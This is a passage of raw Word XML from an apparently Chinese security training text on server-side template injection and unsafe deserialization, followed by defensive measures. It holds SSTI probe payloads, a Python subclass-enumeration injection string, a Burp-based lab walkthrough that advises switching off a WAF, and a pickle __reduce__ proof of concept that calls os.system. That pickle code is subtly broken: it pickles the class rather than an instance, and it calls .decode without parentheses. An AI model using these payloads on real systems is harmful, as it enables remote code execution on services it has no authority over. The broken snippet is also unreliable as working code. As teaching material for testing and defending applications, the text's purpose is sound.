        <w:t xml:space="preserve">，证明注入点在服务端被求值。通过查阅公开文档，攻击者可以构造更复杂的表达式去访问</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内置函数，最终实现远程代码执行（同样需要结合特定类与方法，如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__class__.__bases__.__subclasses__</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等技巧）。但这里我们严格遵守武器化红线，只讨论如何证明注入存在，绝不提供完整命令执行链。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">要检测</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SSTI，最安全的方式是发送一组多引擎探针，观察页面输出。常见的探针包括</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{{7*7}}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">${7*7}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;%= 7*7 %&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">${{7*7}}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等，覆盖不同模板语法的数学求值。如果</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">49</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">出现在响应中，就说明注入点存在。不同引擎的特征前缀也可用于识别引擎类型，例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通常关联</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Jinja2/Twig，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">${</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">关联</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> FreeMarker </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等。更高级的检测使用不带副作用的元数据提取（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{{‘a’.getClass}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）来辅助确认。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SSTI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与反序列化漏洞一样，源于一个简单的错误强假设：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">模板文件中的内容都是开发者自己写的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。一旦用户内容进入模板本体，代码注入就如同水银泻地。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">靶机实操单元（概念验证）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目标：在授权实验环境中，利用一个故意脆弱的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Flask/Jinja2 Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用演示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSTI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的存在性，不执行危险系统命令。反序列化部分以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">最小示例说明不可信反序列化的危害边界。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">环境搭建：拉取一个公开的漏洞容器（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">docker pull &lt;VULN_IMAGE&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，具体镜像名因靶机版本而异），或使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PortSwigger Web Security Academy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSTI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实验室（需注册并遵循其使用条款）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SSTI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">探测步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（所有命令在实验环境内执行）：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理拦截提交用户姓名的请求，观察到参数</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">name=test</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">修改参数值为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{{7*7}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，放行后观察</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">响应中是否出现</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">49</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。如果出现，即证实模板注入存在。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可进一步尝试</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{{‘’ .__class__.__mro__[1].__subclasses__}}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">列出所有子类，但</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">切勿</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">继续向下深入寻找</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> os </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块——这已经越过武器化红线。我们仅在授权实验室中确认注入存在即可。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">预期输出片段：响应中会包含类似</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;class 'subprocess.Popen'&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的类名列表（因</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">版本和环境而变化）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">常见排错：若不成功，检查是否使用了正确的模板语法（尝试</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">${7*7}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;%=7*7%&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），或参数是否在渲染前被转义。确保请求被成功放行，而非被</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">拦截（如果实验环境有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">WAF，请暂时关闭或使用白名单测试）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">反序列化简单示例（Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> pickle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">仅用于警示）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在隔离的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">环境中运行以下脚本（仅限教学，勿用于其他场景）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> pickle, os, base64</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> POC:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> __reduce__(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (os.system, (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'echo vulnerability_triggeRED'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(base64.b64encode(pickle.dumps(POC)).decode)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将输出的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Base64 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字符串发送给假设的接收端点（该端点会反序列化此数据），可以看到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vulnerability_triggeRED</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">被打印，表明任意命令执行可行。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">这一演示的目的在于揭示不可信</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> pickle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">数据的危险性，绝不意味着可以在任何真实应用中尝试</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">针对反序列化漏洞：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">根本防御</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：完全避免对不可信数据执行反序列化。如果业务必须接收序列化数据，则使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">纯粹数据格式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JSON、Protocol </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Buffers）代替原生序列化，因为数据格式的解析器没有代码执行能力。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">完整性校验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：对序列化数据进行数字签名（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">HMAC），并在反序列化前验证签名，确保数据未被篡改。签名密钥必须妥善保存服务器端。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">类型白名单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：如果必须反序列化，应在代码中实现严格的类型白名单（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ValidatingObjectInputStream</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pickle.Unpickler</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">find_class</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">限制可用的类）。不允许任意类反序列化。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">监控与日志</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：蓝队应监控反序列化异常、过多的反序列化错误、以及典型的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gadget </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">特征串（如特定类名出现在载荷中）。WAF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可配置规则拦截包含已知危险类签名的序列化流量，但这属于纵深防御，非根治。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">针对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SSTI：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">逻辑分离</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：模板与数据必须严格分离。永远不要将用户输入拼接到模板字符串中。使用模板引擎的变量插值功能：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">render_template('hello.html', name=user_input)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">而不是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">render_template_string('Hello ' + user_input)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">沙箱与受限引擎</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：对不可避免需要用户提供模板的极少数场景（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CMS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">主题编辑），应使用无代码求值能力的模板引擎（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Mustache、Handlebars </w:t>
      </w:r>
      <w:r>
